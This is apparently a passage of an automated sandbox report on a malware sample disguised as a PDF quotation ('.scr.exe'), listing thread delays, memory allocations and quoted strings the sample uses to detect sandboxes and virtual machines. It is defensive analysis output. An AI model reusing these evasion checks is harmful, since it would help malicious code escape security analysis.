            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE|VIRTUAL|A M I|XEN*SELECT * FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT|VMWARE|VIRTUAL.JOHN/ANNA0XXXXXXXX
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL2Y
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeMemory allocated: 228E51C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeMemory allocated: 228FEC20000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory allocated: 19050990000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory allocated: 19068C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595747Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598576Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598452Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598333Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597886Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596999Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596124Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595905Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595792Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595653Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595543Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595387Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeWindow / User API: threadDelayed 7843Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeWindow / User API: threadDelayed 1986Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 1841Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 7993Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7340Thread sleep count: 7843 > 30Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7336Thread sleep count: 1986 > 30Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99764s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -99073s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98936s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98827s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98615s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98403s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -98031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -97110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -96110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -95985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -95780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -95646s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -95516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595747s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe TID: 7308Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7896Thread sleep count: 1841 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7896Thread sleep count: 7993 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598576s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598452s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598333s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -598156s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597886s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597218s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596999s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596671s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596343s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596124s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595905s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595792s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595653s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595543s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595387s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594515s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594406s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594296s >= -30000sJump to behavior
